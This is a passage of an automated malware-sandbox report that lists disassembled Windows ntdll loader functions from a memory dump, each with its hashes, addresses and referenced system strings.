                                                                                                                                        • Opcode ID: 6d0d9633f36f3a478799886893dbf0fc3395856193f855968f02c457220dfeca
                                                                                                                                        • Instruction ID: f890e39a49fc289f0e184355a012a96589c9f26d3f4f8871f3224b84e537ea6d
                                                                                                                                        • Opcode Fuzzy Hash: 6d0d9633f36f3a478799886893dbf0fc3395856193f855968f02c457220dfeca
                                                                                                                                        • Instruction Fuzzy Hash: 74E08C326042247BD220FA5ADC02FDB77ACDFC5714F01481AFA09A7242C6B5B91287F9
                                                                                                                                        Function 01132C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 150 1132c0a-1132c0f 151 1132c11-1132c18 150->151 152 1132c1f-1132c26 LdrInitializeThunk 150->152
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: d0ac78a821e553f496b1346f02da212d5607a22724d5a3345611a8194af64e9f
                                                                                                                                        • Instruction ID: 1bcf1448e8b057792c4a874cf4917706ec0f32475fc27b7f80784b1320e2fbe3
                                                                                                                                        • Opcode Fuzzy Hash: d0ac78a821e553f496b1346f02da212d5607a22724d5a3345611a8194af64e9f
                                                                                                                                        • Instruction Fuzzy Hash: 59B09B719015C5C6DA15F7A44708717790077D0701F35C061D2030641F4778D1D1E275

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 01172349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-2160512332
                                                                                                                                        • Opcode ID: d762c9e2e273533e9d8a5d65d2806e439526febdd49539f9c215de9253b3558b
                                                                                                                                        • Instruction ID: 13c366d0ded5d968a41b9734e3f2ac1de8e2e0f1a8b771ecd9eb7558645cf987
                                                                                                                                        • Opcode Fuzzy Hash: d762c9e2e273533e9d8a5d65d2806e439526febdd49539f9c215de9253b3558b
                                                                                                                                        • Instruction Fuzzy Hash: 88928C71608742AFE729DE29C880B6BB7F8BB84754F04492DFA94D7350D770E845CB92
                                                                                                                                        Function 01128620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • undeleted critical section in freed memory, xrefs: 0116542B
                                                                                                                                        • double initialized or corrupted critical section, xrefs: 01165508
                                                                                                                                        • Thread identifier, xrefs: 0116553A
                                                                                                                                        • Critical section address., xrefs: 01165502
                                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0116540A, 01165496, 01165519
                                                                                                                                        • Critical section debug info address, xrefs: 0116541F, 0116552E
                                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011654CE
                                                                                                                                        • Address of the debug info found in the active list., xrefs: 011654AE, 011654FA
                                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01165543
                                                                                                                                        • 8, xrefs: 011652E3
                                                                                                                                        • corrupted critical section, xrefs: 011654C2
                                                                                                                                        • Invalid debug info address of this critical section, xrefs: 011654B6
                                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011654E2
                                                                                                                                        • Critical section address, xrefs: 01165425, 011654BC, 01165534
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                        • API String ID: 0-2368682639
                                                                                                                                        • Opcode ID: b736997edf62c050661be7d7fc97c8ac3de877558c9a9204573f527354768413
                                                                                                                                        • Instruction ID: da8c2df46673aca1b7c6a8238aec9cb1a996ff79cb6a4984579828b480b97ca4
                                                                                                                                        • Opcode Fuzzy Hash: b736997edf62c050661be7d7fc97c8ac3de877558c9a9204573f527354768413
                                                                                                                                        • Instruction Fuzzy Hash: 4A8191B1A40359EFDB68CF99C845FAEBBFABB48714F10811AF548BB240D771A944CB50
                                                                                                                                        Function 011229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01162506
                                                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01162602
                                                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01162624
                                                                                                                                        • @, xrefs: 0116259B
                                                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01162498
                                                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011624C0
                                                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011622E4
                                                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01162412
                                                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0116261F
                                                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01162409
                                                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011625EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                        • API String ID: 0-4009184096
                                                                                                                                        • Opcode ID: 1f8ac55935a0b09d81f2684579d3f052db78c221b5251c427853343972103521
                                                                                                                                        • Instruction ID: 166ff1bbcfd001aa2118071d2305f757f70d2fe630c587dcd80e8f8f17adc4d5
                                                                                                                                        • Opcode Fuzzy Hash: 1f8ac55935a0b09d81f2684579d3f052db78c221b5251c427853343972103521
                                                                                                                                        • Instruction Fuzzy Hash: B50291B1D002299BDB39DB54CC80BEEB7B8AF54304F0141EAE649A7241EB319F94CF59
                                                                                                                                        Function 01198B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                        • API String ID: 0-2515994595
                                                                                                                                        • Opcode ID: 1381ec190afaa43d7cceb3f6e80701b4652af2a981db4de9a4c86aa9d610c137
                                                                                                                                        • Instruction ID: 5d16b078ada7cc342749eb8f708bc455613f338c75c710bc0ce9fe7f90ae858f
                                                                                                                                        • Opcode Fuzzy Hash: 1381ec190afaa43d7cceb3f6e80701b4652af2a981db4de9a4c86aa9d610c137
                                                                                                                                        • Instruction Fuzzy Hash: 5651E0715083499BCB2DCF18C844BAFBBE8FF96644F14491DEAA9C3240E770D608CB92
                                                                                                                                        Function 011A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                        • API String ID: 0-1700792311
                                                                                                                                        • Opcode ID: 58db72a37ed3306cdebb63739e7534a6f8a347200eafd80074beba1980c8c72c
                                                                                                                                        • Instruction ID: 2d8e83d03f27a740550ce6e44102744d09bf3558cd91e1c091262dfb8bb00d10
                                                                                                                                        • Opcode Fuzzy Hash: 58db72a37ed3306cdebb63739e7534a6f8a347200eafd80074beba1980c8c72c
                                                                                                                                        • Instruction Fuzzy Hash: BED1FF39A00682DFDB2ADFA9C444AADBFF1FF4A704F48805DF4859B652C734A980CB50
                                                                                                                                        Function 011789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01178A3D
                                                                                                                                        • VerifierDebug, xrefs: 01178CA5
                                                                                                                                        • HandleTraces, xrefs: 01178C8F
                                                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01178B8F
                                                                                                                                        • VerifierFlags, xrefs: 01178C50
                                                                                                                                        • VerifierDlls, xrefs: 01178CBD
                                                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01178A67
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                        • API String ID: 0-3223716464
                                                                                                                                        • Opcode ID: 4999750e69bcafac8151a47a35339355681bd4242166bfdfbf4f1623b7bc4aa5
                                                                                                                                        • Instruction ID: d56b8490e4f851c5ad139db55056186839cfc99e602679d3e974a627e834b479
                                                                                                                                        • Opcode Fuzzy Hash: 4999750e69bcafac8151a47a35339355681bd4242166bfdfbf4f1623b7bc4aa5
                                                                                                                                        • Instruction Fuzzy Hash: 8D913671A45716EFD72DEFA8C888B5A7BF5AB54728F050428FA406F341C7709C41CB92
                                                                                                                                        Function 010FEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                        • API String ID: 0-1109411897
                                                                                                                                        • Opcode ID: c98e17738528e535133d42e6f4a88d6a3426ccbd684453d28d792a956f7a5237
                                                                                                                                        • Instruction ID: ba6538b7a101218c439cf445328634d504063a7899b0715709c760eb475efb6a
                                                                                                                                        • Opcode Fuzzy Hash: c98e17738528e535133d42e6f4a88d6a3426ccbd684453d28d792a956f7a5237
                                                                                                                                        • Instruction Fuzzy Hash: 35A24A75A0562ACFDBA8DF18C8897ADBBB1BF45304F1442E9D959A7650EB309EC1CF00
                                                                                                                                        Function 011263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-792281065
                                                                                                                                        • Opcode ID: bde9a8145a7f8889122abfad7202bb3f7179879ceabfe7f3a9cb8f7abbb00371
                                                                                                                                        • Instruction ID: 72c055d2c57b70bf876d3eb6e5af2189e1cf209fd75bd74fa50c08f69b41ee12
                                                                                                                                        • Opcode Fuzzy Hash: bde9a8145a7f8889122abfad7202bb3f7179879ceabfe7f3a9cb8f7abbb00371
                                                                                                                                        • Instruction Fuzzy Hash: 60913530B00765DBEB3DDF98E844BAE7BA6BF50B18F10012CE9506B6C1D7719891C791
                                                                                                                                        Function 010E645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011499ED
                                                                                                                                        • LdrpInitShimEngine, xrefs: 011499F4, 01149A07, 01149A30
                                                                                                                                        • apphelp.dll, xrefs: 010E6496
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01149A11, 01149A3A
                                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01149A2A
                                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01149A01
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-204845295
                                                                                                                                        • Opcode ID: 05d414a2ae2b4fce97cb55bc82f604938d328af8af723d6aa9f502394f8786f9
                                                                                                                                        • Instruction ID: a4769771f95e44f8c7db25bd871029bdd54f22a66f3e12dd4e734dd66973f667
                                                                                                                                        • Opcode Fuzzy Hash: 05d414a2ae2b4fce97cb55bc82f604938d328af8af723d6aa9f502394f8786f9
                                                                                                                                        • Instruction Fuzzy Hash: 985103712083099FD728DF65D845BAB77E8FB88B48F10092DF5959B290D731E944CB93
                                                                                                                                        Function 01122674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011621BF
                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01162160, 0116219A, 011621BA
                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0116219F
                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01162165
                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01162178
                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01162180
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                        • Opcode ID: 10819795752d5d2be8ed40cd1b4c04d19f3f8c85b07326c3df15268a69d8587a
                                                                                                                                        • Instruction ID: f98a10e666021ecf201868da7d3fedd293a389a73b46f0110be393fefe4b5abd
                                                                                                                                        • Opcode Fuzzy Hash: 10819795752d5d2be8ed40cd1b4c04d19f3f8c85b07326c3df15268a69d8587a
                                                                                                                                        • Instruction Fuzzy Hash: F331E536F44335BBE7298A9A8C42F6F7A78DBA5A94F050059FB04BB240D3709A11C6A1
                                                                                                                                        Function 0112C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • LdrpInitializeProcess, xrefs: 0112C6C4
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0112C6C3
                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01168177, 011681EB
                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01168181, 011681F5
                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 011681E5
                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01168170
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                        • Opcode ID: 063824a466456085cc626f035503fd9b414310230b17ca391f4ec2177ea4e326
                                                                                                                                        • Instruction ID: ca92fc31d7f6f20adb486f62ddf0f79f87b445ec07a6f57b8f1c933759f6928e
                                                                                                                                        • Opcode Fuzzy Hash: 063824a466456085cc626f035503fd9b414310230b17ca391f4ec2177ea4e326
                                                                                                                                        • Instruction Fuzzy Hash: 3231E2B16447569FC22CEF68D946E1AB7E8AF94B14F04056CFA846B395E720EC04C7A2
                                                                                                                                        Function 0113096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 01132DF0: LdrInitializeThunk.NTDLL ref: 01132DFA
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01130BA3
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01130BB6
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01130D60
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01130D74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1404860816-0
                                                                                                                                        • Opcode ID: d024f0062ccd1022f505e1676e3f649fcf4ce4a2ab0449ce60f6602fc3873019
                                                                                                                                        • Instruction ID: 0773dc17f89b8772239ffcf44a05edcd8f6c1f1f876a37cfc4780d2cbbc75736
                                                                                                                                        • Opcode Fuzzy Hash: d024f0062ccd1022f505e1676e3f649fcf4ce4a2ab0449ce60f6602fc3873019
                                                                                                                                        • Instruction Fuzzy Hash: FF427D71900719DFDB29CF28C840BAAB7F8FF48314F1445A9E989DB245E771AA84CF61
                                                                                                                                        Function 010FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                        • API String ID: 0-379654539
                                                                                                                                        • Opcode ID: f189ee259091859ca27134961bb4717266de5de789bc145314524070b8379167
                                                                                                                                        • Instruction ID: 0e8ed1aabb1f439b3417d8b74acf41222616580a13e64eb97a15d6725123b422
                                                                                                                                        • Opcode Fuzzy Hash: f189ee259091859ca27134961bb4717266de5de789bc145314524070b8379167
                                                                                                                                        • Instruction Fuzzy Hash: DAC1BC75208382CFD715CF58C045B6AB7E4BF88704F04886EFAD98BA51E734DA49CB52
                                                                                                                                        Function 01128402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0112855E
                                                                                                                                        • LdrpInitializeProcess, xrefs: 01128422
                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01128421
                                                                                                                                        • @, xrefs: 01128591
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                        • Opcode ID: 57391fefdbb04d671c610f68ab59b6c651eeddff039e9e192dc9cb4739b63fbe
                                                                                                                                        • Instruction ID: b8d894428c8bae3060beaf046889bd72eefffbd2e3a1885d64d6945a00694095
                                                                                                                                        • Opcode Fuzzy Hash: 57391fefdbb04d671c610f68ab59b6c651eeddff039e9e192dc9cb4739b63fbe
                                                                                                                                        • Instruction Fuzzy Hash: C291AD71508355AFD72AEF65CC40FABBAECBF84788F40092EFA8496155E330D954CB62
                                                                                                                                        Function 0112273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011621D9, 011622B1
                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011622B6
                                                                                                                                        • .Local, xrefs: 011228D8
                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 011621DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                        • API String ID: 0-1239276146
                                                                                                                                        • Opcode ID: 27264cdf9edf166413c8116488907ed6c9e61d4f6646f8e482f693dbeb4b3b0d
                                                                                                                                        • Instruction ID: ff1b3f353b274059dd7248975fbfcf17416f1926d28f00142aad898436599e41
                                                                                                                                        • Opcode Fuzzy Hash: 27264cdf9edf166413c8116488907ed6c9e61d4f6646f8e482f693dbeb4b3b0d
                                                                                                                                        • Instruction Fuzzy Hash: 97A1D131A0023ADBDF29CF58C884BA9B3B5BF58354F1541EAD948A7251E7709E90CF81
                                                                                                                                        Function 010F64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01151028
                                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011510AE
                                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01150FE5
                                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0115106B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010C0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_10c0000_QsBdpe1gK5.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
